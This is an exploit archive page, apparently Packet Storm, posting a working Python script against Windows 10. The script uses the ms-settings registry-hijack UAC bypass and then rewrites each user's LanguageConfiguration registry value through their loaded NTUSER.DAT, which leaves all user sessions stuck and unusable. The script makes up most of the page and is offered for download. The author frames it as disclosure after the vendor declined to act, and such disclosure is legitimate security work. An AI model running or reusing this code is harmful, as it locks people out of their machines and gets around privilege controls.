what you don't know can hurt you

Microsoft Windows 10 User Sessions Stuck

Microsoft Windows 10 User Sessions Stuck
Posted Oct 30, 2018
Authored by Fabien Dromas

This exploit modifies a windows language registry key which causes some windows binaries to stick, including login which makes the session unusable. The key is in HKCU and can be modified without admin rights, but with a bypass UAC, all user sessions can be paralyzed by using reg.exe and user's NTUSER.DAT.

tags | exploit, registry
systems | windows
MD5 | 3e4fd43ec5cd4d8013e6761b559ecdf7

Microsoft Windows 10 User Sessions Stuck

Change Mirror Download
#!/usr/bin/env python
#
# Exploit Title: Windows 10 All Users Session Stuck
# Date: 2018-10-24
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
# Twitter: st0rnpentest
#
# After microsoft's refusal to consider the issue as a security problem, I disclose the script
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.345
# Tested on: Windows 10 pro Version 10.0.17134.345
#

from os import listdir, system, path
from ctypes import *
import _winreg

def create_reg_key(key, value):
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise

def exec_bypass_uac(cmd):
try:
create_reg_key('DelegateExecute', '')
create_reg_key(None, cmd)
except WindowsError:
raise

def bypass_uac():
try:
current=path.dirname(path.realpath(__file__)) + '\\' + __file__
cmd="C:\windows\System32\cmd.exe /k c:\python27\python %s" %current
exec_bypass_uac(cmd)
system(r'C:\windows\system32\ComputerDefaults.exe')
return 1
except WindowsError:
sys.exit(1)

def modify_reg_key(key, value):
try:
registry_key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise


def modify_reg_key_Others(key, value):
try:
registry_key = _winreg.OpenKey(_winreg.HKEY_USERS, 'w00t\Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise

if __name__ == '__main__':
try:
sys32="c:\\windows\\system32\\"
users="c:\\users\\"
exclude=["Public", "desktop.ini", "All Users"]

# Modify all users
if windll.Shell32.IsUserAnAdmin():
for i in listdir(users):
if i not in exclude:
system("reg.exe LOAD HKU\w00t "+users+i+"\NTUSER.DAT")
modify_reg_key_Others('', '')
system("reg.exe UNLOAD HKU\w00t")

# Modify current user
modify_reg_key('', '')
else:
bypass_uac()
except WindowsError:
raise

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    2 Files
  • 18
    Feb 18th
    27 Files
  • 19
    Feb 19th
    32 Files
  • 20
    Feb 20th
    15 Files
  • 21
    Feb 21st
    17 Files
  • 22
    Feb 22nd
    12 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close